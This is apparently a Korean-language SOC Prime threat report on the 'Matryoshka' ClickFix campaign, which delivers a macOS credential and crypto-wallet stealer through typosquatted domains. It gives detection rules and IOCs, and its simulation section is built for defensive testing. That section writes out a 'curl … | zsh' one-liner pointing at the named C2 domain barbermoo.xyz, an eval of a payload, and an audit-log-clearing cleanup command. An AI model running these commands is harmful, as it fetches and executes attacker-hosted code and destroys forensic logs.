SOC Prime Bias: 중간

17 2월 2026 18:00

맥 보안 블로그

새로운 “Matryoshka” ClickFix 변종 해부: 오타전술 캠페인으로 macOS 스틸러 전달

Ruslan Mikhalov SOC Prime에서 위협 연구 책임자

팔로우

새로운 “Matryoshka” ClickFix 변종 해부: 오타전술 캠페인으로 macOS 스틸러 전달

Detection stack

AIDR
Alert
ETL
Query

위협 보고서
공격 흐름
탐지
시뮬레이션

요약

Matryoshka로 불리는 새로운 macOS 맬웨어 작전은 타이포스쿼팅된 도메인을 악용하여 피해자를 사회공학적으로 속여 Terminal에 악성 명령어를 붙여넣게 만듭니다. 이 원라이너는 메모리에서 디코딩되는 인코딩된 스크립트를 가져와 궁극적으로 브라우저 자격 증명 및 암호화폐 지갑을 노린 AppleScript 기반의 스틸러를 배포합니다. 설치 프로그램은 백그라운드에서 조용히 실행되며, 가시 출력을 억누르고 수집된 데이터를 사용하여 업로드합니다. 커스텀 API 헤더이 캠페인은 소프트웨어 악용보다는 사용자 상호작용에 의해 추진됩니다.

조사

Intego 애널리스트들은 도메인 타이포스쿼팅 도메인이 사용자들을 barbermoo.xyz에 호스팅된 경량 셸 단계로 리다이렉트하는 체인을 처음부터 끝까지 재구성했습니다. 그 스크립트는 메모리에서 Base64 + gzip 디코딩을 수행하고, AppleScript 페이로드를 가져오는 로더를 실행하며, 탈출 전 /tmp/osalogging.zip에 수집 결과를 보관합니다. AppleScript는 가짜 시스템 환경설정 프롬프트를 통해 자격 증명을 훔치려고 시도하며, Ledger Live 및 Trezor Suite 애플리케이션 번들을 교체하거나 패치하여 암호화 도구를 목표로 합니다.

완화

사용자 인식이 주요 통제 수단입니다: 웹사이트에서 Terminal 명령어를 붙여넣지 마십시오. 식별된 타이포스쿼팅 및 C2 관련 도메인뿐만 아니라 배달을 지원하는 트래픽 분배 인프라를 차단하고 모니터링하십시오. 애플리케이션 허용 목록을 적용하고, 의심스러운 osascript 실행 및 비정상적인 curl 기반 검색 패턴을 감지할 수 있는 엔드포인트 보호를 사용하십시오.

대응

Terminal로 시작된 curl이 zsh나 osascript로 파이핑되는 것을 알리고, /tmp/osalogging.zip의 생성과 Ledger Live 및 Trezor Suite 번들의 예기치 않은 변경을 감시하십시오. barbermoo.xyz, comparisions.org 및 macfilesendstream.com에 대한 DNS 필터링을 강제 적용하십시오. curl 기반 명령어 실행 직후 백그라운드에서 조용히 시작되는 프로세스를 조사하십시오.

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access[“동작 – T1204.001 사용자 실행 악성 링크 설명: 피해자가 타이포스쿼팅 도메인을 방문하고 복사-붙여넣기 명령을 보게 됨.”] class action_initial_access action tool_curl[“도구 – 이름: curl 설명: URL에서 피해자 시스템으로 데이터를 전송함.”] class tool_curl tool process_fetch_rogue[“프로세스 – 이름: fetch_rogue.sh 명령: curl … | sh”] class process_fetch_rogue process action_execution[“동작 – T1059.004 유닉스 셸 설명: Unix 셸 명령을 실행하여 rogue.sh를 다운로드하고 실행함.”] class action_execution action action_obfuscation[“동작 – T1027.009 임베디드 페이로드 설명: rogue.sh는 메모리에서 직접 디코딩되는 base64-gzip 페이로드를 포함함.”] class action_obfuscation action action_indirect_exec[“동작 – T1202 간접 명령 실행 설명: 로더가 백그라운드에서 실행되고 터미널과 분리되며 I/O를 억제함.”] class action_indirect_exec action tool_applescript[“도구 – 이름: AppleScript 설명: 사용자 입력을 캡처하기 위해 가짜 시스템 설정 대화상자를 표시함.”] class tool_applescript tool action_gui_capture[“동작 – T1056.002 GUI 입력 캡처 설명: AppleScript 대화상자가 사용자가 입력한 비밀번호를 캡처함.”] class action_gui_capture action action_cred_harvest[“동작 – T1056 입력 캡처 설명: 사용자 상호작용 후 스크립트가 저장된 브라우저 자격 증명을 수집함.”] class action_cred_harvest action action_masquerade[“동작 – T1036 가장 설명: Ledger Live와 Trezor Suite 바이너리를 악성 버전으로 교체하고 재서명함.”] class action_masquerade action action_stage_data[“동작 – T1074.001 로컬 데이터 스테이징 설명: 탈취된 파일을 /tmp/osalogging.zip에 저장 후 유출 준비함.”] class action_stage_data action action_c2_comm[“동작 – T1071.001 웹 프로토콜 설명: HTTP(S) 요청과 사용자 정의 API-key 헤더를 사용해 C2 서버와 통신함.”] class action_c2_comm action action_exfil_over_c2[“동작 – T1041 C2 채널을 통한 데이터 유출 설명: POST 요청을 통해 스테이징된 zip 아카이브를 C2 서버로 업로드함.”] class action_exfil_over_c2 action action_auto_exfil[“동작 – T1020 자동화된 데이터 유출 설명: 추가 사용자 상호작용 없이 데이터가 자동으로 C2로 전송됨.”] class action_auto_exfil action %% Connections action_initial_access –>|uses| tool_curl tool_curl –>|downloads| process_fetch_rogue process_fetch_rogue –>|executes| action_execution action_execution –>|leads to| action_obfuscation action_obfuscation –>|enables| action_indirect_exec action_indirect_exec –>|uses| tool_applescript tool_applescript –>|triggers| action_gui_capture action_gui_capture –>|captures| action_cred_harvest action_cred_harvest –>|feeds| action_masquerade action_masquerade –>|stores| action_stage_data action_stage_data –>|transfers| action_c2_comm action_c2_comm –>|exfiltrates| action_exfil_over_c2 action_exfil_over_c2 –>|automates| action_auto_exfil %% Class assignments class action_initial_access,action_execution,action_obfuscation,action_indirect_exec,action_gui_capture,action_cred_harvest,action_masquerade,action_stage_data,action_c2_comm,action_exfil_over_c2,action_auto_exfil action class tool_curl,tool_applescript tool class process_fetch_rogue process

공격 흐름

탐지

cmdline을 통한 Base64 인코딩 문자열 조작 가능성

SOC Prime 팀

2026년 2월 17일

보기

MacOS 임시 폴더에 아카이브가 생성되었습니다 (file_event 경유)

SOC Prime 팀

2026년 2월 17일

보기

이상한 최상위 도메인(TLD) DNS 요청을 통한 의심스러운 명령 및 제어

SOC Prime 팀

2026년 2월 17일

보기

의심스러운 Curl 실행 시도 [MacOS] (cmdline 경유)

SOC Prime 팀

2026년 2월 17일

보기

Matryoshka 변종 터미널 명령 실행 감지 [Linux 프로세스 생성]

SOC Prime AI 규칙

2026년 2월 17일

보기

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준선 점검이 통과해야 합니다.

근거: 이 섹션은 탐지 규칙을 유발하도록 설계된 적대 기법(TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 설명은 식별된 TTP를 직접 반영해야 하며, 탐지 논리가 기대하는 정확한 텔레메트리를 생성하는 것을 목표로 합니다.

공격 내러티브 및 명령어:
낮은 권한의 macOS 계정을 이미 침해한 공격자는 디스크에 파일을 쓰지 않고 원격 페이로드를 실행하려고 합니다. 그들은 악성 C2 도메인으로부터 base-64로 인코딩된 스크립트를 가져오는 원라이너를 제작합니다.barbermoo.xyz), 파이프를 통해 직접 zsh, 그리고 마침내 eval 를 사용하여 인메모리 페이로드를 실행합니다. 이 접근 방식은 T1059.004 (유닉스 셸) 및 T1027 (난독화)와 일치하며, Sigma 규칙이 감시하는 것입니다.
1. 공격자는 그들의 캠페인에 요청을 연결하는 고유한 토큰(ABCD1234)을 획득합니다.
2. 그들은 터미널 세션에서 다음과 같은 원 라이너를 실행합니다:
```
curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
```
3. 가져온 스크립트 내에서 변수 payload 은 base64로 인코딩된 악성 페이로드를 보유하며, 다음을 통해 실행됩니다:
```
eval "$payload"
```
이는 규칙이 일치하는 두 개의 명령줄 항목을 생성합니다:
- curl -fsSL https://barbermoo.xyz/curl/ABCD1234 | zsh
- eval "$payload"

회귀 테스트 스크립트:
아래 스크립트는 제어된 실험실 환경에서 악성 행동을 재현합니다. macOS 테스트 호스트에서만 실행하십시오. 자신의 실행을 시스템 감사 로그에 기록하여 탐지 규칙을 만족시킵니다.

#!/usr/bin/env bash
# -------------------------------------------------
# Matryoshka Variant Simulation – triggers Sigma rule
# -------------------------------------------------
set -euo pipefail

# --- Configuration -------------------------------------------------
TOKEN="ABCD1234"                     # Replace with any string to simulate uniqueness
MALICIOUS_URL="https://barbermoo.xyz/curl/${TOKEN}"
# A tiny harmless payload for demo – echoing a message (replace with real payload in red-team)
PAYLOAD="echo 'Malicious payload executed'"

# --- Step 1: Fetch and pipe to zsh (matches first detection pattern) ---
curl -fsSL "${MALICIOUS_URL}" | zsh

# --- Step 2: Simulate in-memory eval (matches second pattern) -------------
# In a real attack the payload would be base64-encoded and decoded on-the-fly.
eval "${PAYLOAD}"

정리 명령: 일시적인 프로세스를 제거하고 셸 상태를 복원합니다.

# 테스트로 생성된 zsh 프로세스(아직 실행 중일 경우) 종료
pkill -f "zsh -c .*barbermoo.xyz"

# 옵션으로 테스트 항목의 감사 로그를 지웁니다 (관리자 권한 필요)
sudo audit -c      # 감사 버퍼를 플러시합니다 (T1070.010을 시연)

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입

Name	Descripiton
PHPSESSID	Preserves user session state across page requests. Cookie generated by applications based on the PHP language. This is a general purpose identifier used to maintain user session variables. It is normally a random generated number, how it is used can be specific to the site, but a good example is maintaining a logged-in status for a user between pages.
sp_i	Used to store information about authenticated User.
sp_r	Used to store information about authenticated User.
sp_a	Used to store information about authenticated User.

Name	Descripiton
tuuid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
tuuid_last_update	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
um	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
umeh	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
na_sc_x	Used by the social sharing platform AddThis to keep a record of parts of the site that has been visited in order to recommend other parts of the site.
APID	Collects anonymous data related to the user's visits to the website.
IDSYNC	Collects anonymous data related to the user's visits to the website.
_cc_aud	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_cc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_dc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_id	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
dpm	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
acs	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
clid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
KRTBCOOKIE_#	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PUBMDCID	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PugT	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
ssi	Registers a unique ID that identifies a returning user's device. The ID is used for targeted ads.
_tmid	Registers a unique ID that identifies the user's device upon return visits. The ID is used to target ads in video clips.
wam-sync	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
wui	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
AFFICHE_W	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
B	Collects anonymous data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The registered data is used to categorise the users' interest and demographical profiles with the purpose of customising the website content depending on the visitor.
1P_JAR	These cookies are used to gather website statistics, and track conversion rates.
APISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
HSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
NID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SAPISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SIDCC	Security cookie to protect users data from unauthorised access.
SSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
__utmx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.
__utmxx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.

Name	Descripiton
_hjid	Hotjar cookie. This cookie is set when the customer first lands on a page with the Hotjar script. It is used to persist the random user ID, unique to that site on the browser. This ensures that behavior in subsequent visits to the same site will be attributed to the same user ID.
_hjIncludedInSample	This cookie is associated with web analytics functionality and services from Hot Jar, a Malta based company. It uniquely identifies a visitor during a single browser session and indicates they are included in an audience sample.
intercom-id-[xxx]	This cookie is used by Intercom as a session so that users can continue a chat as they move through the site.
intercom-session-[xxx]	Used to keeping track of sessions and remember logins and conversations.
demdex	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
CookieConsent	Stores the user's cookie consent state for the current domain.
__cfduid	Used by the content network, Cloudflare, to identify trusted web traffic.
ss	These cookies enable the website to provide enhanced functionality and personalisation . They may be set by us or by third party providers whose services we have added to our pages. These services may include the Live Chat facility, Contact Us form(s), the Product Quotation forms and submission process, and the Email Newsletter sign up functionality .

Name	Descripiton
_ga	This cookie name is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page. Registers a unique ID that is used to generate statistical data on how the visitor uses the website. request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.
_gat	Used by Google Analytics to throttle request rate. This cookie name is associated with Google Universal Analytics, according to documentation it is used to throttle the request rate - limiting the collection of data on high traffic sites. It expires after 10 minutes.
_gid	This cookie name is asssociated with Google Universal Analytics. This appears to be a new cookie and as of Spring 2017 no information is available from Google. It appears to store and update a unique value for each page visited. Registers a unique ID that is used to generate statistical data on how the visitor uses the website.
IDE	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
r/collect	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
test_cookie	Used to check if the user's browser supports cookies.
collect	Used to send data to Google Analytics about the visitor's device and behaviour. Tracks the visitor across devices and marketing channels.
ads/user-lists/#	These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites.
c	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
khaos	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
put_#	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpb	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpx	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
tap.php	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.